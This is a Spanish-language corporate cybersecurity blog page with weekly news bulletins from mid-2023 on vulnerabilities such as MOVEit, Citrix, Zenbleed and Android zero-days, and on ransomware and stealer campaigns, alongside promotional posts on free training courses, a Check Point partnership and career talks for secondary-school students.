Security Consecuencias de un ciberataque en entornos industriales 17 de enero de 2023
31 de julio de 2023
Boletín de Ciberseguridad, 22-28 de julio
Campaña de ransomware Cl0p explotando vulnerabilidad en MOVEit El pasado 31 de mayo de 2023, Progress Software publicó un parche para la vulnerabilidad crítica de inyección SQL que podría permitir a los atacantes obtener el control total de un equipo que contuviera el software MOVEit. En concreto, este fallo de seguridad registrado como CVE-2023-34362, CVSSv3 9.8, se consideró una 0-day debido a que antes de su parche se identificó activamente su explotación. Días después, Microsoft atribuyó a operadores de ransomware Cl0p la autoría de una campaña de aprovechamiento de esta vulnerabilidad. Desde entonces el número de víctimas, según Konbriefing, se ha ido incrementando, siendo actualmente 522 organizaciones repartidas en multitud de sectores a nivel global, incluyendo empresas de consultoría, tecnología o retail entre otras, siendo EE.UU. el país con más afectación. En base a estos hechos, Ryan McConechy, CTO de Barrier Networks, declaraba al medio digital Spiceworks que las autoridades recomiendan a las entidades no negociar con los atacantes. Mas info: https://www.spiceworks.com/it-security/security-general/articles/moveit-vulnerability-impact-victims/ Vulnerabilidad crítica en routers MikroTik Investigadores de VulnCheck informaron que una falla crítica de elevación de privilegios en routers MikroTik RouterOS representa un riesgo importante para más de 900.000 dispositivos. La vulnerabilidad, identificada como CVE-2023-30799 (CVSS 9.1) permite a actores de amenaza remotos con cuentas de administrador existentes obtener el nivel de super-admin a través de la interfaz HTTP o Winbox del dispositivo. Aunque se requieren credenciales válidas, el sistema no está protegido contra ataques de fuerza bruta debido a un usuario admin predeterminado conocido. La vulnerabilidad fue originalmente revelada en junio de 2022 como un exploit denominado FOISted sin un identificador CVE. Sin embargo, no se parcheó por completo hasta julio de 2023 para versión 6.49.8. Una PoC desarrollada por VulnCheck demostró que es posible controlar el sistema operativo RouterOS, obtener acceso de super-admin a través de una simple escalada de privilegios, y ocultar actividades. MikroTik recomienda aplicar la última actualización, eliminar interfaces administrativas de Internet, restringir direcciones IP de inicio de sesión, deshabilitar Winbox y usar solo SSH con claves públicas/privadas para mitigar la vulnerabilidad. Más info: https://vulncheck.com/blog/mikrotik-foisted-revisited Descubiertos 15.000 servidores Citrix expuestos a ataques RCE Investigadores de la organización sin ánimo de lucro Shadowserver Foundation han alertado de que una búsqueda en fuentes abiertas revela que en la actualidad hay al menos 15.000 servidores Citrix expuestos a la vulnerabilidad CVE-2023-3519, CVSSv3 de 9.8, que podría ser aprovechada por un actor amenaza para ejecutar código de forma remota sin autenticación. Cabe indicar que para explotar esta vulnerabilidad se requiere que el dispositivo vulnerable este configurado como una puerta de enlace o como un servidor virtual de autenticación. Shadowserver indica que estos equipos Citrix Netscaler ADC y Citrix Gateway aparecen con una última fecha de actualización previa a la publicación del parche, por lo que asumen que están expuestos. Por otra parte, CISA advirtió de que una infraestructura crítica en Estados Unidos fue atacada recientemente mediante la explotación del 0-day de esta vulnerabilidad. Más info:https://twitter.com/Shadowserver/status/1682355280317919233 Actualización de seguridad de Apple para un nuevo 0-day Apple ha publicado una nueva actualización de seguridad para iOS, iPadOS, macOS, tvOS, watchOS y Safari para solucionar una vulnerabilidad 0-day de la que tiene constancia que ha sido explotada en ataques recientes contra versiones de iOS lanzadas antes de iOS 15.7.1. La vulnerabilidad ha sido catalogada como CVE-2023-38606, aún no se ha asignado CVSS, y permite que una aplicación maliciosa modifique potencialmente el estado del kernel. CVE-2023-38606 es la tercera vulnerabilidad relacionada con la llamada Operation Triangulation, un ataque zero-click (la recepción del mensaje desencadena la infección sin necesidad de interacción del usuario) contra dispositivos iOS a través de iMessage. Las otras dos 0-days, CVE-2023-32434 y CVE-2023-32435, ya habían sido parcheadas por Apple. Más info: https://support.apple.com/en-us/HT213841 Vulnerabilidad en CPUs AMD Zen2 permite robar datos confidenciales El investigador de seguridad de Google Tavis Ormandy descubrió una nueva vulnerabilidad que afecta a las CPUs AMD Zen2 y que podría permitir a un actor de amenaza robar datos confidenciales, como contraseñas y claves de cifrado, a una velocidad de 30 KB/s de cada núcleo de la CPU. La vulnerabilidad se ha clasificado como CVE-2023-20593 y está causada por el manejo inadecuado de una instrucción llamada 'vzeroupper' durante la ejecución, una técnica común de mejora del rendimiento utilizada en todos los procesadores modernos. Tras activar un exploit optimizado para la vulnerabilidad, un actor de amenaza podría filtrar datos confidenciales de cualquier operación del sistema, incluidas las que tienen lugar en máquinas virtuales, sandboxes aislados, contenedores, etc. El investigador de Google ha publicado una PoC para explotar la vulnerabilidad. Más info: https://lock.cmpxchg8b.com/zenbleed.html
28 de julio de 2023
Cursos gratuitos online para adquirir nuevos conocimientos tecnológicos
La tecnología está en constante cambio y evolución, a la vez que adquiere mayor importancia cada día tanto en nuestra vida personal como en la profesional. Esto nos exige, como individuos y como profesionales, mantenernos actualizados en cuanto a conocimientos y competencias tecnológicas. La llegada del verano, con más tiempo libre para muchos, puede ser un buen momento para aprender sobre Ciberseguridad, Inteligencia Artificial o tecnología IoT (Internet de las Cosas). Afortunadamente existen numerosos recursos y cursos gratuitos online con información y cursos que se pueden completar en unas horas, incluso desde el móvil, con diferentes fines: desde satisfacer la inquietud personal a la necesidad de ponerse al día, reinventarse, o adaptarse al mercado laboral. Este tipo de recursos también nos ayudan a encontrar nuevas oportunidades laborales o a experimentar posibles carreras profesionales o formativas. En España actualmente hay más de 120.000 puestos de trabajo sin cubrir debido a la falta de perfiles digitales adecuados. (1) Si tienes interés en mejorar tus habilidades tecnológicas y encontrar nuevas oportunidades, en este post hemos recopilado una selección de contenidos que exploran las posibilidades formativas actuales en Ciberseguridad, programación, Inteligencia Artificial e IA generativa y en Internet de las Cosas (IoT) AI of Things Empieza ya a programar Inteligencia Artificial: lenguajes, herramientas y recomendaciones 18 de enero de 2023 Cyber Security Cisco tiene un curso gratuito de Ciberseguridad imprescindible en la era digital 17 de julio de 2023 AI of Things Iníciate en Inteligencia Artificial generativa (y responsable) con estos cursos gratuitos de Google 8 de junio de 2023 Cyber Security Los 4 mejores lenguajes de programación para principiantes 24 de marzo de 2021 Conectividad e IoT Cursos gratuitos online para aprender IoT (Internet de las Cosas) 3 de agosto de 2023 __ 1. Fuente: Radiografía de las vacantes en el sector tecnológico. Imagen de lookstudio en Freepik.
24 de julio de 2023
.jpg)
Boletín de Ciberseguridad, 15-21 de julio
Campaña contra el sector financiero de América Latina IBM Security X-Force ha detectado una campaña de phishing por correo electrónico distribuyendo el malware BlotchyQuasar desde finales de abril al pasado mayo. El malware, desarrollado por un grupo identificado como Hive0129, está codificado para recopilar credenciales de múltiples sitios web y aplicaciones bancarias de América Latina. Se trata de un troyano bancario desarrollado sobre el código base de QuasarRAT, que se encuentra en continuo desarrollo y que posee funcionalidades como la instalación de certificados y URL de configuración automática de proxy que pueden facilitar la suplantación de instituciones financieras. Además, instala herramientas de terceros como PuTTY, RDP, Chrome/Opera Portable, AnyDesk y otros stealers de credenciales. La campaña consiste en el envío a las víctimas de un correo electrónico suplantando a agencias gubernamentales de América Latina, en el que se incluye un enlace a un documento y un PDF que comienza la cadena de infección. En cuanto al grupo, Hive0129, rastreado por X-Force desde 2019, se cree que su origen estaría en América del Sur, dirigido hacia entidades gubernamentales y privadas en Colombia, Ecuador, Chile y España. Más info NoEscape: nuevo ramsonware que amenaza con doble extorsión y filtración de datos Recientemente se observó un nuevo ransomware que se cree que es el sucesor de Avaddon, el cual cerró sus operaciones en 2021. Conocido como NoEscape, este nuevo ransomware comenzó a operar en junio de 2023, apuntando a empresas en ataques de doble extorsión. En los que amenazan con hacer públicos los datos a menos que se pague un rescate, que oscila entre cientos de miles y más de 10 millones de dólares. NoEscape roba datos corporativos antes de cifrar los archivos y elimina procesos asociados con software de seguridad, aplicaciones de respaldo, servidores web y bases de datos. Además, Utiliza el cifrado Salsa20 y agrega una extensión única de 10 caracteres a los archivos cifrados. Asimismo, modifica el fondo de pantalla y muestra notas de rescate que proporcionan instrucciones para el pago de este en su sitio web en Tor. Actualmente hay diez víctimas afectadas de diferentes países e industrias en su sitio de filtración de datos, lo que indica que no se centran en una industria y región específica. Más info Análisis del stealer BundleBot Investigadores de Check Point Research han publicado un artículo en el que analizan un nuevo stealer/bot que abusa del paquete dotnet como archivo único. Denominado BundleBot, se distingue por su cadena de infección, la cual es más sofisticada, aprovechando anuncios de Facebook y cuentas vulneradas para redirigir a las víctimas a sitios web que suplantan programas, herramientas de IA y juegos. Algunas de estas son Google AI, PDF Reader, Canva o Super Mario 3D World. Una vez que la víctima accede y descarga el programa ilegítimo, comienza la primera etapa de infección, que consiste en un archivo RAR el cual contiene el paquete dotnet. En la segunda etapa se descarga un ZIP protegido con contraseña, que se extrae y ejecuta BundleBot, el cual explota el paquete dotnet. Como stealer, entre sus funcionalidades está la exfiltración de información del sistema a través de su C2, entre ella datos del equipo como nombre de usuario, versión del sistema operativo, IP, datos de navegadores web como cookies, credenciales o tarjetas de crédito, información de la cuenta de Facebook o capturas de pantalla. Cabe destacar que debido al uso del paquete dotnet como archivo único, la infección en varias etapas y la ofuscación, BundleBot se caracteriza por ser difícilmente detectable. Más info Boletín de seguridad de Oracle La compañía Oracle ha lanzado parches de seguridad para corregir fallos de seguridad que afectan a más de 130 productos utilizados en diversas industrias. En concreto, se ha abordado en este mes de julio hasta un total de 508 nuevos parches de seguridad, de los cuales 76 de ellos han sido considerados como críticos. Entre los productos parcheados se encuentran Oracle Financial Services Applications, con un total de 147 vulnerabilidades, de las cuales 115 podrían ser explotadas de forma remota. Asimismo, Oracle Communications que, de los 77 fallos de seguridad recopilados, 57 también podrían ser aprovechados por parte de actores maliciosos de forma remota. Y Oracle Fusion Middleware con unas cifras similares de 60 actualizaciones de seguridad de las cuales 40 se han identificado como explotables de forma remota. En último lugar, cabe señalar que MySQL también es uno de los productos destacados en afectación con un total de 21 vulnerabilidades. Desde Oracle se recomienda a los usuarios actualizar a la última versión para evitar posibles explotaciones por parte de actores maliciosos. Más info Foto: rawpixel.com / Freepik.
21 de julio de 2023
.jpg)
Boletín de Ciberseguridad, 8-14 de julio
Corregidas tres nuevas vulnerabilidades en MOVEit Transfer Progress Software ha publicado actualizaciones de seguridad para tres vulnerabilidades que afectan al software de transferencia MOVEit Transfer. La primera de ellas, identificada como CVE-2023-36934 y de severidad critica, podría permitir que atacantes no autenticados obtengan acceso no autorizado a la base de datos de MOVEit y desde allí ejecuten malware, manipulen archivos o extraigan información. Otra de las vulnerabilidades corregidas fue considerada de alta gravedad. Identificada como CVE-2023-36932 consiste en una falla de inyección SQL que pueden aprovechar los actores de amenazas que inician sesión para obtener acceso no autorizado a la base de datos del software. Estos dos problemas de seguridad de inyección SQL afectan a las versiones 12.1.11, 13.0.9, 13.1.7, 14.0.7, 14.1.8, 15.0.4 y anteriores. El tercer fallo de seguridad corregido es el CVE-2023-36933, que es una vulnerabilidad que permite a los actores de amenazas cerrar inesperadamente el programa MOVEit Transfer. Y afecta a las versiones 13.0.9, 13.1.7, 14.0.7, 14.1.8, y 15.0.4. Progress Software ha puesto a disposición las actualizaciones necesarias para todas las versiones y recomienda encarecidamente a los usuarios que actualicen a la última versión para reducir los riesgos que plantean estas vulnerabilidades. Asimismo, debido a los recientes acontecimientos, la empresa comunicó que planea lanzar actualizaciones de productos MOVEit cada dos meses. Más info Parcheada vulnerabilidad 0-day en Apple Apple ha publicado una nueva ronda de actualizaciones de Rapid Security Response (RSR) para hacer frente a una nueva vulnerabilidad 0-day explotada en ataques que afectan a iPhones, Macs y iPads. La vulnerabilidad ha sido clasificada como CVE-2023-37450 y fue reportada por un investigador anónimo. Apple informa de que es consciente de que la vulnerabilidad 0-day puede haber sido explotada activamente. La vulnerabilidad se ha encontrado en el motor del navegador WebKit desarrollado por Apple, y permite a los atacantes obtener la ejecución de código arbitrario en los dispositivos objetivo engañando a los usuarios para que abran páginas web con contenido maliciosamente diseñado. La empresa ha solucionado esta vulnerabilidad con comprobaciones mejoradas para mitigar los intentos de explotación. Desde principios de 2023, Apple ha parcheado diez vulnerabilidades 0-day que afectaban a iPhones, Macs o iPads. Más info Microsoft corrige 132 vulnerabilidades, incluidas seis 0-days Microsoft lanzó su actualización de seguridad mensual para abordar un total de 130 vulnerabilidades, incluyendo seis fallos 0-day que se han estado explotado activamente. De las 130 vulnerabilidades, nueve se clasificaron como críticas y 121 como importantes. Algunos de los agujeros de seguridad explotados activamente incluyen vulnerabilidades de elevación de privilegios en la plataforma MSHTML de Windows (CVE-2023-32046 CVSS 7.8), omisión de la característica de seguridad de Windows SmartScreen y Microsoft Outlook (CVE-2023-32049 y CVE-2023-35311 CVSS 8.8), elevación de privilegios del servicio de informe de errores de Windows (CVE-2023-36874 CVSS 7.8), y ejecución remota de código HTML de Office y Windows (CVE-2023-36884 CVSS 8.3). También fueron publicadas otras vulnerabilidades críticas, incluyendo algunas que permiten la ejecución remota de código. Microsoft insta a sus usuarios a aplicar las actualizaciones lo más rápido posible para mitigar las amenazas potenciales. Más info Corregida vulnerabilidad crítica en Citrix Secure Access Citrix ha emitido un aviso de seguridad en el que aborda una vulnerabilidad crítica que podría permitir a los actores de amenaza escalar sus privilegios si tienen acceso a un punto final con una cuenta de usuario estándar. La vulnerabilidad, identificada como CVE-2023-24492, cuenta con un CVSS de 9.8 y afecta a Citrix Secure Client para Ubuntu en versiones anteriores a la 23.5.2. Los atacantes pueden explotar esta vulnerabilidad para ejecutar código malicioso de forma remota en el dispositivo del usuario. Esto se puede lograr mediante la persuasión del usuario para que haga clic en un enlace malicioso y acepte las indicaciones posteriores. Asimismo, Citrix corrigió otra vulnerabilidad reconocida como CVE-2023-24491 (CVSS 7.8) que afecta a Citrix Desktop para Windows en versiones anteriores a 23.5.1.3. este fallo de seguridad permite que un atacante autenticado con acceso a un endpoint estándar pueda elevar sus privilegios a NT AUTHORITY\SYSTEM. Ambas vulnerabilidades fueron descubiertas por Rilke Petrosky de F2TC Cyber Security. Citrix recomienda a los usuarios de estos productos que actualicen a las últimas versiones para evitar la explotación. Más info Análisis de PyLoose, malware sin archivos basado en Python Investigadores de Wiz.io han publicado un análisis acerca de PyLoose, un malware innovador sin archivos que actúa sobre las cargas de trabajo en la nube. Según los investigadores, este tipo de ataque se habría utilizado para la criptominería hasta en 200 casos. En primer lugar, el atacante obtiene el acceso inicial a través de un servicio expuesto de Jupyter Notebook. Por otro lado, en lugar de escribir payloads en el disco, se explotan las características del sistema operativo, para lo cual descodifican y descomprimen XMRig, cargándolo en la memoria a través de memfd, el sistema de archivos basado en RAM de Linux. Finalmente, ejecutan XMRig en memoria, conectado a una IP remota asociada al grupo de minería MoneroOcean. Cabe destacar la complejidad de detección por las medidas de seguridad convencionales que presenta este tipo de ataque. Más info Imagen de rawpixel.com en Freepik.
14 de julio de 2023
.jpg)
Innovaciones en Ciberseguridad para proteger a las empresas: nuevas soluciones para nuevas amenazas
La Ciberseguridad se ha convertido en una prioridad fundamental para las empresas. Con el aumento de las ciberamenazas y el riesgo constante al que se enfrentan las organizaciones, es imprescindible contar con soluciones avanzadas que ofrezcan una protección integral y robusta. En este contexto, en Telefónica Tech, en colaboración con nuestro socio estratégico Check Point Software, nos hemos posicionado como un referente en el ámbito de la Ciberseguridad. En un reciente evento organizado por Check Point Software, se revelaron las novedades más destacadas de Check Point Quantum Network Security que incluimos en el porfolio de servicios de Ciberseguridad que desde Telefónica Tech ofrecemos a nuestros clientes. El nuevo panorama de la Ciberseguridad El evento comenzó abordando el panorama actual de la Ciberseguridad, donde se destacó la preocupación por los ataques de nueva generación con tecnologías basadas en Inteligencia Artificial. Aunque los fabricantes de soluciones de Ciberseguridad ya cuentan con tecnología de defensa y protección que hace uso de la Inteligencia Artificial, la implementación de estas soluciones supone todavía un desafío para muchas empresas. Durante el evento se enfatizó la necesidad de cambiar la forma en que los equipos operan y la importancia de tener los conocimientos necesarios para gestionar la infraestructura de manera más efectiva. Dos capacidades que aplicamos en los servicios gestionados y profesionales que proporcionamos desde Telefónica Tech al desplegar tecnologías de Ciberseguridad. Evolución de las ciberamenazas Durante el evento también se discutió la evolución de las amenazas cibernéticas en el último año y las medidas implementadas para fortalecer las defensas de las compañías. Se mencionó el aumento del hacktivismo, de la actividad de grupos con motivaciones políticas más organizados y que se han vuelto más destructivos. Se destacó el uso de herramientas legítimas por parte de los ciberdelincuentes, quienes aprovechan las aplicaciones ya instaladas en los dispositivos de los usuarios para infiltrar software malicioso. En este sentido, una estrategia de confianza cero (Zero Trust) minimiza este tipo de tendencias y proporciona más protección. Novedades en el porfolio de Check Point Quantum Network Security: firewalls de última generación Uno de los aspectos más importante del evento fue la presentación de las nuevas tecnologías hardware, como los firewalls de Check Point Software, para asegurar la seguridad en la red los clientes en tres pilares fundamentales: Check Point Quantum, que ofrece protección completa para la red. Check Point CloudGuard, centrado en proteger la seguridad de la nube. Check Point Harmony proporciona seguridad a para los usuarios, dispositivos y accesos móviles y correos electrónicos. Estas soluciones se complementan con ThreatCloud, una red de inteligencia, y Horizon, una plataforma de gestión unificada de operaciones. Dentro del porfolio de nuestro partner Check Point Software, los nuevos firewalls Quantum destacan como una herramienta esencial para la gestión del acceso y la prevención de amenazas en el perímetro y la segmentación de redes. La nueva propuesta de firewalls de Check Point Software llamada Quantum Maestro permite conectar y robustecer la infraestructura de seguridad de la red. Quantum Maestro es un único hardware que permite conectar todos los cluster legacy e incluso con firewalls virtuales, permitiendo crecer bajo demanda, adaptando la necesidad de hardware al crecimiento del tráfico, optimizando la inversión en CAPEX y minimizando riesgos de previsiones de necesidades incorrectas. La capacidad de prevención en tiempo real frente a la detección es una ventaja significativa, reduciendo la exposición al malware y minimizando los falsos positivos. Además se presentó Threat Extraction, una función que permite la entrega en tiempo real de documentos ofimáticos totalmente limpios. Otro aspecto clave del evento fue la importancia de la automatización, la integración con otras tecnologías y la construcción de políticas dinámicas. Se resaltó la integración de la Plataforma de Seguridad de Checkpoint con otros proveedores de tecnología, como Cisco ACI Switch Fabric y NSX-T, como un paso importante hacia la gestión unificada de la seguridad. La estrategia Zero Trust también se mencionó como una forma efectiva de proteger los sistemas, al negar todo acceso no autorizado y permitir solo lo que es necesario. Además, se presentó R81 Cyber Security Platform, que incluye funcionalidades de SD-WAN e IoT Protect para una mayor protección en la red. El futuro de la Ciberseguridad El evento concluyó destacando el papel fundamental de la Inteligencia Artificial en el nuevo panorama de la Ciberseguridad. La aplicación de técnicas de IA, como el aprendizaje automático (deep learning), permite una detección más precisa de amenazas y una reducción significativa de los falsos positivos. Check Point Software ha desarrollado más de 75 motores basados en tecnologías tradicionales y basadas en Inteligencia Artificial para diagnosticar y prevenir vulnerabilidades en todas las tecnologías. Nuestra colaboración con Check Point Software beneficia a las empresas al fortalecer su seguridad, resiliencia y continuidad mediante soluciones avanzadas de seguridad, reafirmando nuestro compromiso conjunto de ofrecer productos y soluciones para una Ciberseguridad integral y robusta. AUTORES IGNACIO GARCÍA HERRAEZ Strategic Partners Development Expert & MARISA STRZELECKI SINOPOLI Strategic Partners Development Sr Manager Ciberseguridad Future Workplace La importancia del control de acceso: ¿está tu empresa protegida? 29 de mayo de 2023 Imagen de Freepik.
13 de julio de 2023
.jpg)
Boletín de Ciberseguridad, 1-7 de julio '23
Microsoft niega ser víctima de filtración de datos por parte de Anonymous Sudán El Recientemente, el grupo hacktivista Anonymous Sudán publicó en su canal de Telegram la puesta a la venta de una presunta base de datos que contendría más de 30 millones de credenciales de cuentas de Microsoft por valor de 50.000 dólares. Asimismo, se incluía una muestra de datos como prueba de los hechos señalados por parte de este actor amenaza. Sin embargo, el medio digital BleepingComputer se puso en contacto con Microsoft para obtener información sobre este incidente, a lo cual un portavoz de la compañía señala que tras la realización de una investigación interna no se ha detectado evidencia de que los datos hayan sido accesibles o comprometidos por parte de Anonymous Sudán. Cabe destacar que el mes pasado Microsoft admitió que Anonymous Sudán fue responsable de las interrupciones de servicios como Azure, Outlook y OneDrive mediante ataques de DDoS. Más info Mozilla corrige vulnerabilidades en Firefox Mozilla ha lanzado la versión Firefox 115 en la que corrige varias vulnerabilidades. En primer lugar, hay una serie de vulnerabilidades de alto impacto, la CVE-2023-37201, es un fallo de Use-after-free en WebRTC. Por su parte, la CVE-2023-37202, también hace referencia a un potencial Use-after-free en SpiderMonkey. Además, las identificadas como CVE-2023-37211 y CVE-2023-37212, se deben a errores de seguridad de la memoria, que podrían ser explotados para ejecutar código arbitrario. Por otro lado, la CVE-2023-3482, con un impacto moderado, podría provocar que sitios web maliciosos almacenen datos de seguimiento sin permiso, aunque esté configurado para bloquear el almacenamiento de las cookies. En cuanto al resto de vulnerabilidades de impacto moderado, se incluyen las identificadas como CVE-2023-37203, CVE-2023-37204, CVE-2023-37205, CVE-2023-37206, CVE-2023-37207, CVE-2023-37208 y CVE-2023-37209; las cuales podrían derivar en ataques de suplantación de identidad o en fallos que permitan la suplantación de URL en la barra de direcciones, validación insuficiente de enlaces en la API del sistema de archivos, omisión de advertencia al abrir archivos con código malicioso o Use-after-free. Se recomienda actualizar Firefox para solucionar estos problemas de seguridad. Más info Cyber Security AI of Things Cosas que no deberías contarle a ChatGPT 4 de julio de 2023 Campaña maliciosa contra entidades bancarias en España y Chile El equipo de investigadores de SentinelOne, en colaboración con vx-underground, han publicado los resultados de una investigación en la que informan sobre una campaña dirigida contra entidades bancarias por parte del actor amenaza Neo_Net. En concreto, dicho actor malicioso estaría detrás de una campaña de malware de Android dirigida contra instituciones financieras de todo el mundo, aunque principalmente geolocalizadas en España y Chile, entre junio de 2021 y abril de 2023. Cabe indicar que se estima que Neo_Net habría robado más de 350.000€ de cuentas bancarias y habría comprometido la información personal de miles de víctimas. En cuanto a la metodología empleada, los ataques se producirían en varias etapas, comenzando con mensajes SMS de phishing, utilizando ID de remitente (SID) para suplantar la entidad bancaria a fin de engañar a las víctimas, continuando con una infraestructura de amplio alcance, que incluye paneles de phishing y troyanos de Android. Más info Google corrige tres vulnerabilidades en Android explotadas activamente Google ha publicado actualizaciones de seguridad mensuales para el sistema operativo Android en la que solucionó 46 vulnerabilidades que afectan al SO, incluyendo tres 0-day que estaban siendo explotadas activamente. La primera de ellas, identificada como CVE-2023-26083 (CVSS 3.3) es una falla de fuga de memoria en el controlador de GPU Arm Mali para chips Bifrost, Avalon y Valhall, que se aprovechó en una cadena de exploits que entregó software espía a dispositivos Samsung en diciembre de 2022. El segundo fallo de seguridad, CVE-2021-29256 (CVSS 8.8) es una falla de divulgación de información y escalada de privilegios de raíz de alta gravedad que también afecta a versiones específicas de los controladores del kernel GPU Bifrost y Midgard Arm Mali. La tercera vulnerabilidad CVE-2023-2136 (CVSS 9.6), consiste en un error de integer overflow en Skia, la biblioteca de gráficos 2D multiplataforma de código abierto de Google que también se usa en Chrome. Asimismo, se solucionó una vulnerabilidad crítica (CVE-2023-21250) en el componente del sistema de Android que afecta a las versiones 11, 12 y 13 del SO. Cuya explotación podría conducir a la ejecución remota de código sin interacción del usuario o privilegios de ejecución adicionales. Google recomienda actualizar Android al nivel de parche 2023-07-05 o posterior para solucionar estos problemas. Más info Desarrollada herramienta que permite enviar malware a usuarios de Teams El Red Team de la marina de los EE UU ha desarrollado una herramienta que permite explotar una vulnerabilidad en Microsoft Teams y entregar archivos maliciosos a los usuarios en una organización. La herramienta, denominada TeamsPhisher, está basada en Python y proporciona un ataque totalmente automatizado. Funciona en entornos donde se permite la comunicación entre usuarios internos y externos de Teams. Actores maliciosos podrían enviar archivos maliciosos a las bandejas de entrada de las víctimas sin depender de estafas de phishing tradicionales. TeamsPhisher incorpora técnicas sobre el acceso inicial a Teams descritas por el investigador Andrea Santese. Asimismo, también la que los investigadores de Jumpsec Labs revelaron recientemente; la cual permite eludir una función de seguridad en Teams utilizando una técnica de referencia directa de objetos inseguros (IDOR). También utiliza una herramienta llamada TeamsEnum desarrollada por Secure Systems Engineering que permite enumerar usuarios de Teams y verificar que puedan recibir mensajes externos. Microsoft continua sin resolver la vulnerabilidad de la que se aprovecha TeamsPhisher alegando que no cumple con los requisitos para un servicio inmediato. Más info Ciberseguridad IA & Data Evolución de la Ciberseguridad: la IA como herramienta de ataque y defensa 28 de junio de 2023 Fotografía: tirachardz en Freepik.
7 de julio de 2023
.jpg)
Boletín de Ciberseguridad, 26 – 30 de junio
Corregidas vulnerabilidades en el servidor DNS BIND El Consorcio de Sistemas de Internet (ISC) ha publicado avisos de seguridad para abordar una serie de vulnerabilidades que afectan a varias versiones de Berkeley Internet Name Domain (BIND), el software de servidor DNS más implementado. Entre las vulnerabilidades corregidas, se encuentra la CVE-2023-2828, CVE-2023-2829 y CVE-2023-2911, todas ellas con CVSS 7.5, cuya explotación exitosa podría agotar toda la memoria disponible en un servidor de destino, haciéndolo no disponible y causando DoS. Si bien ISC indicó no tener evidencia acerca de la explotación de los fallos, recomienda encarecidamente a los usuarios de BIND actualizar el software a la última versión. Más info Nueva campaña de Volt Typhoon explotando vulnerabilidad en Zoho ManageEngine La APT conocida como Volt Typhoon o Bronze Silhouette ha sido detectada utilizando una vulnerabilidad crítica. Según una investigación realizada por CrowdStrike, que rastreó al adversario bajo el nombre de Vanguard Panda, observó al grupo de ciberespionaje en una campaña reciente apuntando a infraestructuras críticas en la región del Pacífico. En dicha campaña, el grupo personalizó sus tácticas utilizando exploits y técnicas de movimiento lateral, además de la vulnerabilidad CVE-2021-40539 en ManageEngine ADSelfService Plus de Zoho, una solución de administración de contraseñas e inicio de sesión único. Permitiéndoles ejecutar código de forma remota y enmascarar su web Shell como un proceso legítimo borrando los registros a medida que avanzaba. Sin embargo, los investigadores mencionan que, a pesar de los intentos de cubrir sus huellas, fueron detectados más web shells, puertas traseras, el código fuente de Java y los archivos compilados de su servidor web Apache Tomcat, lo que llevó a su descubrimiento. No obstante, Volt Typhoon tuvo acceso generalizado al entorno de la víctima durante un período prolongado, demostrando familiaridad con la infraestructura objetivo y siendo diligente en limpiar sus huellas. Más info Mockingjay: nueva técnica que permite eludir detección EDR Investigadores de ciberseguridad de Security Joes descubrieron una nueva técnica de inyección de procesos denominada Mockingjay, la cual podría permitir a actores amenaza eludir EDR y otros productos de seguridad para ejecutar sigilosamente código malicioso en sistemas vulnerados. Mockingjay se distingue de otros enfoques porque no utiliza llamadas a la API de Windows de las que se abusa habitualmente, ni establece permisos especiales, ni realiza asignaciones de memoria, ni siquiera inicia un hilo, eliminando así muchas posibles oportunidades de detección. Los analistas de Security Joes descubrieron la DLL msys-2.0.dll dentro de Visual Studio 2022 Community, que tenía una sección RWX por defecto de 16 KB de tamaño. Al aprovechar esta sección RWX preexistente, se pueden aprovechar las protecciones de memoria inherentes que ofrece, eludiendo eficazmente cualquier función que ya pueda haber sido detectada por los EDR. Más info Descubierta campaña contra empresas de alojamiento web Investigadores de Unit 42 de Palo Alto descubrieron una campaña activa que estuvo dirigida a empresas de alojamiento web e IT durante más de dos años. La campaña, denominada CL-CRI-0021 o Manic Menagerie 2.0, tenía como objetivo aprovechar los recursos de servidores comprometidos mediante la instalación de mineros de criptomonedas en máquinas para obtener ganancias monetarias. Además, desplegaba web shells para obtener un acceso sostenido a los recursos internos de los sitios web comprometidos. Los actores de amenaza convertían los sitios web legítimos secuestrados en servidores de comando y control (C2) a gran escala, afectando a miles de páginas web. Esta actividad maliciosa se realizaba desde sitios web legítimos con buena reputación, lo que dificultaba su detección por parte de soluciones de seguridad. Se emplearon múltiples técnicas para evadir la detección de herramientas de monitoreo y productos de ciberseguridad. Asimismo, se utilizaron cargas útiles, herramientas personalizadas y herramientas legítimas disponibles públicamente para evitar el reconocimiento del malware conocido. Se cree que este actor de amenazas estaba activo desde al menos 2018, atacando empresas de alojamiento web en Australia. Más info Análisis de Dark Power Ransomware Investigadores de Heimdal Security han publicado un análisis acerca del ransomware Dark Power, el cual fue detectado a principios de 2020. Se trata de un ransomware muy efectivo y escrito por NIM, que emplea una técnica de cifrado que genera aleatoriamente una cadena ASCII única que se utiliza para obtener la clave de descifrado. Desde Heimdal indican que la distribución se realizaría a través de correos de phishing, pudiendo también realizarse a través de la explotación de vulnerabilidades. Tras la infiltración en el sistema, comienza un flujo de trabajo en el que inicia la clave de cifrado, cifra la cadena binaria, finaliza procesos y servicios, además puede crear la exclusión de archivos y carpetas. En cuanto al rescate, los actores solicitan aproximadamente 10.000$, incluyendo en la nota la dirección de criptomonedas Monero y un enlace TOR a su sitio web. Según los datos, Dark Power se habría dirigido hacia entidades de diferentes sectores como la educación, salud, fabricación y producción de alimentos, identificándose muestras en EE.UU., Perú, Turquía, Francia, Israel, Egipto, Argelia y República Checa. Desde su resurgimiento el pasado febrero, habría vulnerado al menos 10 empresas. Más info Imagen: Freepik.
30 de junio de 2023
.jpg)
Orientamos a estudiantes de secundaria en profesiones de Ciberseguridad
Hace unos días, expertos de distintos departamentos de los servicios de Ciberseguridad de Telefónica Tech visitaron el Instituto Cardenal Cisneros, en Madrid, para dar unas charlas a los alumnos sobre profesiones relacionadas con este ámbito. La charla estaba dirigida a los estudiantes del 3º y 4º de la ESO. A esa edad para los chavales es todavía difícil decidir qué es lo que quieren estudiar y en qué quieren enfocar su carrera profesional. Con esta iniciativa hemos intentado acercarles al mundo de la Ciberseguridad y a las oportunidades laborales que surgen en este sector tan emocionante e innovador. En este encuentro nos hemos centrado en contar el día a día de cada uno de los que participábamos, los estudios que hemos realizado, y qué es lo que nos ha motivado a trabajar en Ciberseguridad. No han faltado anécdotas, ni ejemplos de cómo los equipos se enfrentan a los retos con el afán de proteger los activos digitales de las empresas. Estas fueron las charlas que compartieron con los estudiantes el equipo de voluntarios: Expertos de distintos departamentos de los servicios de Ciberseguridad de Telefónica Tech ◾ Svetlana Miroshnichenko Basco, responsable del equipo de Calidad y Soporte del servicio DRP, hizo una introducción a las profesiones de Ciberseguridad. Explicó en qué consisten los servicios que ofrece Telefónica Tech como una de las empresas que trabajan en el sector. También sobre el futuro profesional que ofrece, 